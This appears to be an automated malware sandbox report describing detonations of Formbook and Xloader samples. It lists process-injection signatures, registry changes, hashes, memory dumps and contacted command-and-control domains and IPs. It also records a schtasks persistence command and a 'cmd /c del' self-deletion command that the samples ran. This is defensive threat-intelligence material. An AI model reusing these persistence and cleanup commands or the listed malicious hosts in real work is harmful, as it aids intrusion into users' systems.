| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1248-197-0x0000000000000000-mapping.dmp
memory/936-198-0x0000000000000000-mapping.dmp
memory/1672-199-0x0000000000000000-mapping.dmp
memory/1164-200-0x0000000000000000-mapping.dmp
memory/768-201-0x0000000000000000-mapping.dmp
memory/764-202-0x0000000000000000-mapping.dmp
memory/764-206-0x0000000019520000-0x0000000019522000-memory.dmp
memory/764-207-0x0000000019524000-0x0000000019526000-memory.dmp
memory/764-238-0x000000001952A000-0x0000000019549000-memory.dmp
memory/2036-239-0x0000000000000000-mapping.dmp
memory/1672-240-0x0000000000000000-mapping.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
133s
Max time network
115s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
11s
Max time network
118s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
Network
Files
memory/4812-114-0x000000000040188B-mapping.dmp
memory/4812-115-0x00000000022F0000-0x000000000230A000-memory.dmp
memory/4812-117-0x0000000002340000-0x0000000002341000-memory.dmp
memory/4812-116-0x0000000000400000-0x0000000000430000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
11s
Max time network
48s
Command Line
Signatures
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
55s
Max time network
118s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3200 set thread context of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
Files
memory/3200-114-0x0000000000260000-0x0000000000261000-memory.dmp
memory/3200-116-0x0000000004C10000-0x0000000004C11000-memory.dmp
memory/3200-117-0x00000000051B0000-0x00000000051B1000-memory.dmp
memory/3200-118-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
memory/3200-119-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
memory/3200-120-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
memory/3200-121-0x0000000004B70000-0x0000000004C0C000-memory.dmp
memory/3200-122-0x0000000005180000-0x000000000519B000-memory.dmp
memory/3200-123-0x0000000008620000-0x00000000086B0000-memory.dmp
memory/3200-124-0x0000000008710000-0x000000000875B000-memory.dmp
memory/4008-126-0x00000000004025AC-mapping.dmp
memory/4008-125-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
150s
Max time network
160s
Command Line
Signatures
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 656 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2016 set thread context of 3060 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 640 set thread context of 3060 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\Explorer.EXE |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.lovecartoonforever.com | udp |
| N/A | 8.8.8.8:53 | www.formerknown.com | udp |
| N/A | 199.34.228.164:80 | www.formerknown.com | tcp |
| N/A | 8.8.8.8:53 | www.carap.club | udp |
| N/A | 104.21.29.206:80 | www.carap.club | tcp |
| N/A | 8.8.8.8:53 | www.wiloasbanhsgtarewdasc.solutions | udp |
| N/A | 8.8.8.8:53 | www.arodsr.com | udp |
| N/A | 66.235.200.146:80 | www.arodsr.com | tcp |
| N/A | 8.8.8.8:53 | www.blockchaincloud360.com | udp |
| N/A | 34.75.70.164:80 | www.blockchaincloud360.com | tcp |
| N/A | 8.8.8.8:53 | www.lebullterrier.com | udp |
| N/A | 142.250.179.179:80 | www.lebullterrier.com | tcp |
| N/A | 8.8.8.8:53 | www.panyu-qqbaby.com | udp |
| N/A | 107.160.109.196:80 | www.panyu-qqbaby.com | tcp |
| N/A | 8.8.8.8:53 | www.ovtnywveba.club | udp |
| N/A | 8.8.8.8:53 | www.awdjob.info | udp |
| N/A | 34.102.136.180:80 | www.awdjob.info | tcp |
| N/A | 8.8.8.8:53 | www.warrenswindowcleans.co.uk | udp |
| N/A | 85.233.160.22:80 | www.warrenswindowcleans.co.uk | tcp |
| N/A | 8.8.8.8:53 | www.tongaoffshore.com | udp |
| N/A | 195.149.84.100:80 | www.tongaoffshore.com | tcp |
| N/A | 8.8.8.8:53 | www.regarta.com | udp |
| N/A | 173.239.5.6:80 | www.regarta.com | tcp |
| N/A | 8.8.8.8:53 | www.elgallocoffee.com | udp |
| N/A | 192.185.0.218:80 | www.elgallocoffee.com | tcp |
| N/A | 8.8.8.8:53 | www.donjrisdumb.com | udp |
Files
memory/656-114-0x00000000008C0000-0x00000000008C1000-memory.dmp
memory/656-116-0x0000000007B60000-0x0000000007B61000-memory.dmp
memory/656-117-0x0000000007700000-0x0000000007701000-memory.dmp
memory/656-118-0x0000000007660000-0x0000000007B5E000-memory.dmp
memory/656-119-0x00000000076D0000-0x00000000076D1000-memory.dmp
memory/656-120-0x0000000009B40000-0x0000000009B41000-memory.dmp
memory/656-121-0x0000000002AD0000-0x0000000002AD2000-memory.dmp
memory/656-122-0x0000000009420000-0x00000000094A6000-memory.dmp
memory/656-123-0x00000000062D0000-0x0000000006306000-memory.dmp
memory/2016-124-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2016-125-0x000000000041D000-mapping.dmp
memory/2016-126-0x0000000001020000-0x0000000001340000-memory.dmp
memory/3060-128-0x0000000006950000-0x0000000006AC0000-memory.dmp
memory/2016-127-0x0000000000AF0000-0x0000000000B00000-memory.dmp
memory/640-129-0x0000000000000000-mapping.dmp
memory/772-130-0x0000000000000000-mapping.dmp
memory/640-132-0x0000000000E40000-0x0000000000E68000-memory.dmp
memory/640-131-0x0000000000E70000-0x0000000000E7C000-memory.dmp
memory/640-133-0x0000000003720000-0x0000000003A40000-memory.dmp
memory/640-134-0x00000000034C0000-0x000000000354F000-memory.dmp
memory/3060-135-0x0000000006CD0000-0x0000000006E00000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:40
Platform
win7v20210408
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210408
Max time kernel
148s
Max time network
140s
Command Line
Signatures
Formbook
suricata: ET MALWARE FormBook CnC Checkin (GET)
Formbook Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 364 set thread context of 1212 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1652 set thread context of 1212 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDD73.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.mkolgems.com | udp |
| N/A | 34.102.136.180:80 | www.mkolgems.com | tcp |
| N/A | 8.8.8.8:53 | www.patriotstrong.net | udp |
| N/A | 23.227.38.74:80 | www.patriotstrong.net | tcp |
Files
memory/1608-60-0x0000000001030000-0x0000000001031000-memory.dmp
memory/1608-62-0x0000000004D90000-0x0000000004D91000-memory.dmp
memory/1608-63-0x0000000000960000-0x000000000097B000-memory.dmp
memory/1608-64-0x0000000005F90000-0x0000000006008000-memory.dmp
memory/1608-65-0x0000000000E20000-0x0000000000E53000-memory.dmp
memory/1628-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmpDD73.tmp
| MD5 | 43cb1c32af4e2e2dde7dc771ec2b0c44 |
| SHA1 | c975a4c28be5eb7864f6dfef58638b0707e7791b |
| SHA256 | 0ea611bb91ed3a9aac67da012266a0cca65754ede293b165ff0426d7e362aaf0 |
| SHA512 | 1a3e99dbd3da60a31058711da3b4cad3be7cbf4a67de9977c28565a68afd9f3d0eb18c8cc00d73a496c058549942956510f969fdd502e95dfeeacc67436cdb5f |
memory/364-68-0x0000000000400000-0x000000000042E000-memory.dmp
memory/364-69-0x000000000041EBD0-mapping.dmp
memory/364-70-0x00000000008C0000-0x0000000000BC3000-memory.dmp
memory/364-71-0x0000000000290000-0x00000000002A4000-memory.dmp
memory/1212-72-0x0000000004310000-0x00000000043EB000-memory.dmp
memory/1652-73-0x0000000000000000-mapping.dmp
memory/2016-74-0x0000000000000000-mapping.dmp
memory/1652-75-0x0000000000070000-0x0000000000078000-memory.dmp
memory/1652-76-0x00000000000E0000-0x000000000010E000-memory.dmp
memory/1652-77-0x0000000000A10000-0x0000000000D13000-memory.dmp
memory/1652-78-0x00000000004B0000-0x0000000000543000-memory.dmp
memory/1212-79-0x0000000004450000-0x0000000004527000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
150s
Max time network
137s
Command Line
Signatures
Formbook
suricata: ET MALWARE FormBook CnC Checkin (GET)
Formbook Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3056 set thread context of 2092 | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2092 set thread context of 3064 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2092 set thread context of 3064 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1040 set thread context of 3064 | N/A | C:\Windows\SysWOW64\control.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\control.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\control.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\control.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF1F7.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\SysWOW64\control.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.vkgcrew.com | udp |
| N/A | 119.8.53.236:80 | www.vkgcrew.com | tcp |
| N/A | 8.8.8.8:53 | www.stconstant.online | udp |
| N/A | 5.101.152.6:80 | www.stconstant.online | tcp |
| N/A | 8.8.8.8:53 | www.volebahis.com | udp |
| N/A | 34.102.136.180:80 | www.volebahis.com | tcp |
Files
memory/3056-114-0x0000000000850000-0x0000000000851000-memory.dmp
memory/3056-116-0x00000000057C0000-0x00000000057C1000-memory.dmp
